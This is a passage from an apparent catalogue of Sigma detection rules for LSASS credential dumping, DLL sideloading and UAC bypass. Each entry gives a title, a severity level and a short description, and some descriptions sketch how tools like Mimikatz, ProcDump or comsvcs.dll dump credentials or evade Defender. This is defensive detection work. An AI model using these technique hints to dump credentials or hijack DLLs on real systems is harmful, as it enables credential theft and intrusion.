    Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
  • LSASS Process Memory Dump Creation Via Taskmgr.EXE - Level: high
    Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
  • Suspicious Renamed Comsvcs DLL Loaded By Rundll32 - Level: high
    Description: Detects rundll32 loading a renamed comsvcs.dll to dump process memory
  • Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded - Level: high
    Description: Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
  • Time Travel Debugging Utility Usage - Image - Level: high
    Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
  • Unsigned Image Loaded Into LSASS Process - Level: medium
    Description: Loading unsigned image (DLL, EXE) into LSASS process
  • HackTool - Credential Dumping Tools Named Pipe Created - Level: critical
    Description: Detects well-known credential dumping tools execution via specific named pipe creation
  • PowerShell Get-Process LSASS in ScriptBlock - Level: high
    Description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
  • HackTool - Generic Process Access - Level: high
    Description: Detects process access requests from hacktool processes based on their default image name
  • HackTool - HandleKatz Duplicating LSASS Handle - Level: high
    Description: Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
  • Lsass Memory Dump via Comsvcs DLL - Level: high
    Description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
  • LSASS Memory Access by Tool With Dump Keyword In Name - Level: high
    Description: Detects LSASS process access requests from a source process with the "dump" keyword in its image name.
  • Potential Credential Dumping Activity Via LSASS - Level: medium
    Description: Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
  • Credential Dumping Activity By Python Based Tool - Level: high
    Description: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
  • Remote LSASS Process Access Through Windows Remote Management - Level: high
    Description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
  • Suspicious LSASS Access Via MalSecLogon - Level: high
    Description: Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.
  • Potentially Suspicious GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access requests to LSASS process with potentially suspicious access flags
  • Credential Dumping Attempt Via WerFault - Level: high
    Description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.
  • LSASS Access From Potentially White-Listed Processes - Level: high
    Description: Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
  • Potential Adplus.EXE Abuse - Level: high
    Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
  • Process Access via TrolleyExpress Exclusion - Level: high
    Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
  • CreateDump Process Dump - Level: high
    Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
  • Potential Windows Defender AV Bypass Via Dump64.EXE Rename - Level: high
    Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
  • DumpMinitool Execution - Level: medium
    Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
  • Suspicious DumpMinitool Execution - Level: high
    Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
  • HackTool - CrackMapExec Process Patterns - Level: high
    Description: Detects suspicious process patterns found in logs when CrackMapExec is used
  • HackTool - CreateMiniDump Execution - Level: high
    Description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
  • HackTool - Dumpert Process Dumper Execution - Level: critical
    Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
  • HackTool - HandleKatz LSASS Dumper Execution - Level: high
    Description: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same
  • HackTool - Inveigh Execution - Level: critical
    Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
  • HackTool - Mimikatz Execution - Level: high
    Description: Detection well-known mimikatz command line arguments
  • HackTool - SafetyKatz Execution - Level: critical
    Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
  • HackTool - Windows Credential Editor (WCE) Execution - Level: critical
    Description: Detects the use of Windows Credential Editor (WCE)
  • HackTool - XORDump Execution - Level: high
    Description: Detects suspicious use of XORDump process memory dumping utility
  • Dumping Process via Sqldumper.exe - Level: medium
    Description: Detects process dump via legitimate sqldumper.exe binary
  • Time Travel Debugging Utility Usage - Level: high
    Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
  • Potential Credential Dumping Via LSASS Process Clone - Level: critical
    Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
  • Process Memory Dump via RdrLeakDiag.EXE - Level: high
    Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
  • Renamed CreateDump Utility Execution - Level: high
    Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
  • Process Memory Dump Via Comsvcs.DLL - Level: high
    Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
  • LSASS Dump Keyword In CommandLine - Level: high
    Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
  • Procdump Execution - Level: medium
    Description: Detects usage of the SysInternals Procdump utility
  • Potential SysInternals ProcDump Evasion - Level: high
    Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
  • Potential LSASS Process Dump Via Procdump - Level: high
    Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
  • Potential Credential Dumping Via WER - Level: high
    Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
  • Windows Credential Editor Registry - Level: critical
    Description: Detects the use of Windows Credential Editor (WCE)
  • Potential Credential Dumping Via LSASS SilentProcessExit Technique - Level: critical
    Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
  • Lsass Full Dump Request Via DumpType Registry Settings - Level: high
    Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
  • APT31 Judgement Panda Activity - Level: critical
    Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
  • Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process - Level: medium
    Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
  • Potential Credential Dumping Attempt Via PowerShell - Level: medium
    Description: Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts
  • LSASS Access From Program In Potentially Suspicious Folder - Level: medium
    Description: Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder
  • Uncommon GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410
attack.t1574.002 82
Show Rules (82)
  • SCM DLL Sideload - Level: medium
    Description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
  • Svchost DLL Search Order Hijack - Level: high
    Description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine.
  • Possible Process Hollowing Image Loading - Level: high
    Description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz
  • DNS Server Error Failed Loading the ServerLevelPluginDLL - Level: high
    Description: Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
  • Microsoft Defender Blocked from Loading Unsigned DLL - Level: high
    Description: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL
  • Unsigned Binary Loaded From Suspicious Location - Level: high
    Description: Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations
  • DHCP Server Error Failed Loading the CallOut DLL - Level: high
    Description: This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded
  • DHCP Server Loaded the CallOut DLL - Level: high
    Description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
  • Creation Of Non-Existent System DLL - Level: medium
    Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
  • DLL Search Order Hijackig Via Additional Space in Path - Level: high
    Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
  • Malicious DLL File Dropped in the Teams or OneDrive Folder - Level: high
    Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
  • Potential Azure Browser SSO Abuse - Level: low
    Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.
  • Potential 7za.DLL Sideloading - Level: low
    Description: Detects potential DLL sideloading of "7za.dll"
  • Potential Antivirus Software DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
  • Potential appverifUI.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "appverifUI.dll"
  • Aruba Network Service Potential DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
  • Potential AVKkid.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "AVKkid.dll"
  • Potential CCleanerDU.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "CCleanerDU.dll"
  • Potential CCleanerReactivator.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
  • Potential Chrome Frame Helper DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
  • Potential DLL Sideloading Via ClassicExplorer32.dll - Level: medium
    Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
  • Potential DLL Sideloading Via comctl32.dll - Level: high
    Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
  • Potential DLL Sideloading Of DBGCORE.DLL - Level: medium
    Description: Detects DLL sideloading of "dbgcore.dll"
  • Potential DLL Sideloading Of DBGHELP.DLL - Level: medium
    Description: Detects potential DLL sideloading of "dbghelp.dll"
  • Potential DLL Sideloading Of DbgModel.DLL - Level: medium
    Description: Detects potential DLL sideloading of "DbgModel.dll"
  • Potential EACore.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "EACore.dll"
  • Potential Edputil.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "edputil.dll"
  • Potential System DLL Sideloading From Non System Locations - Level: high
    Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
  • Potential Goopdate.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE - Level: medium
    Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
  • Potential Iviewers.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
  • Potential DLL Sideloading Via JsSchHlp - Level: medium
    Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE - Level: high
    Description: Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
  • Potential Libvlc.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
  • Potential Mfdetours.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
  • Unsigned Mfdetours.DLL Sideloading - Level: high
    Description: Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
  • Potential DLL Sideloading Of MpSvc.DLL - Level: medium
    Description: Detects potential DLL sideloading of "MpSvc.dll".
  • Potential DLL Sideloading Of MsCorSvc.DLL - Level: medium
    Description: Detects potential DLL sideloading of "mscorsvc.dll".
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders - Level: high
    Description: Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
  • Microsoft Office DLL Sideload - Level: high
    Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
  • Potential Python DLL SideLoading - Level: medium
    Description: Detects potential DLL sideloading of Python DLL files.
  • Potential Rcdll.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of rcdll.dll
  • Potential RjvPlatform.DLL Sideloading From Default Location - Level: medium
    Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location - Level: high
    Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
  • Potential RoboForm.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
  • Potential ShellDispatch.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "ShellDispatch.dll"
  • DLL Sideloading Of ShellChromeAPI.DLL - Level: high
    Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
  • Potential SmadHook.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
  • Potential SolidPDFCreator.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
  • Third Party Software DLL Sideloading - Level: medium
    Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
  • Fax Service DLL Search Order Hijack - Level: high
    Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
  • Potential Vivaldi_elf.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
  • VMGuestLib DLL Sideload - Level: medium
    Description: Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
  • VMMap Signed Dbghelp.DLL Potential Sideloading - Level: medium
    Description: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading - Level: high
    Description: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
  • Potential DLL Sideloading Via VMware Xfer - Level: high
    Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
  • Potential Waveedit.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
  • Potential Wazuh Security Platform DLL Sideloading - Level: medium
    Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
  • Potential Mpclient.DLL Sideloading - Level: high
    Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
  • Potential WWlib.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "wwlib.dll"
  • Unsigned Module Loaded by ClickOnce Application - Level: medium
    Description: Detects unsigned module load by ClickOnce application.
  • Suspicious Unsigned Thor Scanner Execution - Level: high
    Description: Detects loading and execution of an unsigned thor scanner binary.
  • UAC Bypass With Fake DLL - Level: high
    Description: Attempts to load dismcore.dll after dropping it
  • Potential DLL Sideloading Via DeviceEnroller.EXE - Level: medium
    Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
  • DLL Sideloading by VMware Xfer Utility - Level: high
    Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE - Level: high
    Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
  • Suspicious GUP Usage - Level: high
    Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
  • Potentially Suspicious Child Process of KeyScrambler.exe - Level: medium
    Description: Detects potentially suspicious child processes of KeyScrambler.exe
  • Potential Mpclient.DLL Sideloading Via Defender Binaries - Level: high
    Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
  • Renamed Vmnat.exe Execution - Level: high
    Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
  • Tasks Folder Evasion - Level: high
    Description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
  • Xwizard.EXE Execution From Non-Default Location - Level: high
    Description: Detects the execution of Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
  • DHCP Callout DLL Installation - Level: high
    Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
  • New DNS ServerLevelPluginDll Installed - Level: high
    Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
  • Potential PlugX Activity - Level: high
    Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
  • APT27 - Emissary Panda Activity - Level: critical
    Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
  • Winnti Malware HK University Campaign - Level: critical
    Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
  • Winnti Pipemon Characteristics - Level: critical
    Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
  • DLL Names Used By SVR For GraphicalProton Backdoor - Level: medium
    Description: Hunts known SVR-specific DLL names.
  • Diamond Sleet APT DLL Sideloading Indicators - Level: high
    Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
  • Lazarus APT DLL Sideloading Activity - Level: high
    Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
  • Potential Raspberry Robin Aclui Dll SideLoading - Level: high
    Description: Detects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.
attack.t1574.001 55
Show Rules (55)
  • SCM DLL Sideload - Level: medium
    Description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
  • Svchost DLL Search Order Hijack - Level: high
    Description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine.
  • Use Of Hidden Paths Or Files - Level: low
    Description: Detects calls to hidden files or files located in hidden directories in NIX systems.
  • Creation Of Non-Existent System DLL - Level: medium
    Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
  • HackTool - Powerup Write Hijack DLL - Level: high
    Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).
  • Potential Initial Access via DLL Search Order Hijacking - Level: medium
    Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
  • Creation of WerFault.exe/Wer.dll in Unusual Folder - Level: medium
    Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
  • Potential 7za.DLL Sideloading - Level: low
    Description: Detects potential DLL sideloading of "7za.dll"
  • Potential Antivirus Software DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
  • Potential appverifUI.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "appverifUI.dll"
  • Aruba Network Service Potential DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
  • Potential AVKkid.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "AVKkid.dll"
  • Potential CCleanerDU.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "CCleanerDU.dll"
  • Potential CCleanerReactivator.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
  • Potential Chrome Frame Helper DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
  • Potential DLL Sideloading Via ClassicExplorer32.dll - Level: medium
    Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
  • Potential DLL Sideloading Via comctl32.dll - Level: high
    Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
  • Potential DLL Sideloading Of DBGCORE.DLL - Level: medium
    Description: Detects DLL sideloading of "dbgcore.dll"
  • Potential DLL Sideloading Of DBGHELP.DLL - Level: medium
    Description: Detects potential DLL sideloading of "dbghelp.dll"
  • Potential EACore.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "EACore.dll"
  • Potential Edputil.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "edputil.dll"
  • Potential System DLL Sideloading From Non System Locations - Level: high
    Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
  • Potential Goopdate.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE - Level: medium
    Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
  • Potential Iviewers.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
  • Potential DLL Sideloading Via JsSchHlp - Level: medium
    Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE - Level: high
    Description: Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
  • Potential Libvlc.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
  • Potential Mfdetours.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
  • Unsigned Mfdetours.DLL Sideloading - Level: high
    Description: Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders - Level: high
    Description: Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
  • Microsoft Office DLL Sideload - Level: high
    Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
  • Potential Rcdll.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of rcdll.dll
  • Potential RjvPlatform.DLL Sideloading From Default Location - Level: medium
    Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location - Level: high
    Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
  • Potential RoboForm.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
  • Potential ShellDispatch.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "ShellDispatch.dll"
  • DLL Sideloading Of ShellChromeAPI.DLL - Level: high
    Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
  • Potential SmadHook.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
  • Potential SolidPDFCreator.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
  • Third Party Software DLL Sideloading - Level: medium
    Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
  • Fax Service DLL Search Order Hijack - Level: high
    Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
  • Potential Vivaldi_elf.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
  • VMGuestLib DLL Sideload - Level: medium
    Description: Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
  • VMMap Signed Dbghelp.DLL Potential Sideloading - Level: medium
    Description: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading - Level: high
    Description: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
  • Potential Waveedit.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
  • Potential Wazuh Security Platform DLL Sideloading - Level: medium
    Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
  • Potential WWlib.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "wwlib.dll"
  • Pingback Backdoor File Indicators - Level: high
    Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
  • Pingback Backdoor DLL Loading Activity - Level: high
    Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
  • Pingback Backdoor Activity - Level: high
    Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
  • Small Sieve Malware CommandLine Indicator - Level: high
    Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
  • Lazarus APT DLL Sideloading Activity - Level: high
    Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
  • Potential Raspberry Robin Aclui Dll SideLoading - Level: high
    Description: Detects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.
attack.t1548.002 55
Show Rules (55)
  • UAC Bypass Using Consent and Comctl32 - File - Level: high
    Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
  • UAC Bypass Using .NET Code Profiler on MMC - Level: high
